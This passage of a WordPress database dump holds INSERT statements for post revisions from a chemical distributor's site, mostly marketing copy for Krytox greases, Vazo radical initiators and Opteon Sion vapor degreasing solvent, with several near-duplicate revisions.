outlasting the tester itself.', 'AUT 2245', 'Krytox AUT 2245 grease addresses a broad range of applications from o-ring to bearing lubrication over a wide temperature range where corrosion is a potential issue. It is thickened with polytetrafluoroethylene (PTFE) and contains sodium nitrite, a traditional anti-corrosion additive.\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '714-autosave-v1', '', '', '2016-10-05 19:21:43', '2016-10-05 19:21:43', '', 714, 'https://www.miller-stephenson.com/714-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2281, 44, '2016-10-05 20:25:12', '2016-10-05 20:25:12', '', '', '', 'publish', 'closed', 'closed', '', '2281', '', '', '2016-10-05 20:25:12', '2016-10-05 20:25:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/2281/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2282, 0, '2016-10-05 21:00:57', '2016-10-05 21:00:57', '', '', '', 'publish', 'closed', 'closed', '', '2282', '', '', '2016-10-05 21:00:57', '2016-10-05 21:00:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/2282/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2283, 2, '2016-10-12 20:10:17', '2016-10-12 20:10:17', '<h1><strong>Krytox™ Lube For Life</strong></h1>\n<strong>A North American company improves equipment reliability by switching lubricants and joining the Lube for Life program.</strong>\n\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\n<h4><strong>The Challenge</strong></h4>\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\n<h4><strong>The Solutions</strong></h4>\nAfter researching available options, the reliability superintendent turned to Krytox™ for help. Working with the Krytox™ technical service team, the mill implemented the use of Krytox™ grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox™ lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\n<h4><strong>Key Advantages</strong></h4>\n<ul>\n 	<li>Using Krytox™ lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\n 	<li>Krytox™ lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\n 	<li>Krytox™ lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\n</ul>\nKrytox™ greases offer the potential for lube for life lubrication in demanding electrical motor service. Krytox™ greases are non-oxidizing, water resistant, non-flammable and chemically inert.\n\nKrytox™ greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox™ greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox™ greases provide a thicker oil layer and reduce wear. Krytox™ greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.\n\n[ux_product_categories ids="37" number="10"]\n\nTo learn more about Krytox™ Lube for Life greases please click <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">this link.</a>\n\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Lube For Life', '', 'inherit', 'closed', 'closed', '', '1117-autosave-v1', '', '', '2016-10-12 20:10:17', '2016-10-12 20:10:17', '', 1117, 'https://www.miller-stephenson.com/1117-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2284, 2, '2016-10-06 01:57:55', '2016-10-06 01:57:55', '<strong>Krytox Lube For Life</strong>\r\n\r\n<strong>A North American company improves equipment reliability by switching lubricants.</strong>\r\n\r\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\r\n\r\n<strong>The Solutions</strong>\r\n\r\nAfter researching available options, the reliability superintendent turned to Krytox for help. Working with the Krytox technical service team, the mill implemented the use of Krytox grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\r\n 	<li>Krytox lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\r\n 	<li>Krytox lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\r\n</ul>\r\nKrytox greases offer the potential for lube for life lubrication in demanding electrical motor service. Krytox greases are non-oxidizing, water resistant, non-flammable and chemically inert.\r\n\r\nKrytox greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.\r\n\r\nTo learn more about Krytox Lube for Life greases please click <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">this link.</a>', 'Krytox Lube For Life', '', 'inherit', 'closed', 'closed', '', '1117-revision-v1', '', '', '2016-10-06 01:57:55', '2016-10-06 01:57:55', '', 1117, 'https://www.miller-stephenson.com/1117-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2285, 2, '2016-10-06 02:02:10', '2016-10-06 02:02:10', 'Vazo™ FRS is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. VazoFRS compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the compounds, Vazo 64 (AIBN) has a 10hr half-life at 64 degrees Celsius, while Vazo 88 has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo variant will work for their synthetic pathway, the number associated each FRS analogue indicates its 10hr half-life at that temperature.\r\n\r\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does not exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, lower control on monomer distribution and high oxidation potential versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, FRS initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\r\n\r\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\r\n\r\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.\r\n\r\nTo learn more about Radical Polymerization please go to: <a href="https://en.wikipedia.org/wiki/Radical_polymerization">https://en.wikipedia.org/wiki/Radical_polymerization</a>', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-revision-v1', '', '', '2016-10-06 02:02:10', '2016-10-06 02:02:10', '', 1601, 'https://www.miller-stephenson.com/1601-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2286, 2, '2016-10-12 20:31:18', '2016-10-12 20:31:18', '<h1>Opteon™ Sion - Vapor Degreasing Solvent</h1>\n<h4><strong>What is Vapor Degreasing?</strong></h4>\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\n<ul>\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\n</ul>\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\n<h4><strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\n<ul>\n 	<li>Fast drying, increasing productivity</li>\n 	<li>Compatible with most metals, plastics, and elastomers</li>\n 	<li>Nonflammable and low toxicity</li>\n 	<li>Zero ozone depletion potential (ODP)</li>\n 	<li>Low global warming potential (GWP)</li>\n</ul>\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/vertrel-fluids/">n-Propyl Bromide (nPB)</a></li>\n 	<li>Lenium</li>\n 	<li>EnSolv</li>\n 	<li>AK-225</li>\n 	<li>Novec 72DE</li>\n 	<li>Solstice PF</li>\n 	<li>TF-113</li>\n 	<li>Water</li>\n</ul>\n[ux_product_categories ids="231" number="10"]\n\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>\n\nOpteon™ is  a trademark of The Chemours Company FC, LLC.', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-autosave-v1', '', '', '2016-10-12 20:31:18', '2016-10-12 20:31:18', '', 1135, 'https://www.miller-stephenson.com/1135-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2287, 2, '2016-10-06 02:05:20', '2016-10-06 02:05:20', '<strong>What is Vapor Degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_featured_products products="" columns="4" title="Check our Featured products!"]', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-06 02:05:20', '2016-10-06 02:05:20', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2288, 2, '2016-10-06 02:06:19', '2016-10-06 02:06:19', '<strong>What is Vapor Degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[product_lookbook cat="category-slug" products="8"]', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-06 02:06:19', '2016-10-06 02:06:19', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2289, 2, '2016-10-06 02:08:03', '2016-10-06 02:08:03', '<strong>What is Vapor Degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[product id="1287" sku=""]', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-06 02:08:03', '2016-10-06 02:08:03', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2290, 2, '2016-10-06 02:08:38', '2016-10-06 02:08:38', '<strong>What is Vapor Degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[product id="1287"]', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-06 02:08:38', '2016-10-06 02:08:38', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2291, 2, '2016-10-06 02:09:39', '2016-10-06 02:09:39', '<strong>What is Vapor Degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[featured_products per_page="12" columns="4" orderby="date" order="desc"]', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-06 02:09:39', '2016-10-06 02:09:39', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2292, 2, '2016-10-06 02:10:36', '2016-10-06 02:10:36', '<strong>What is Vapor Degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl 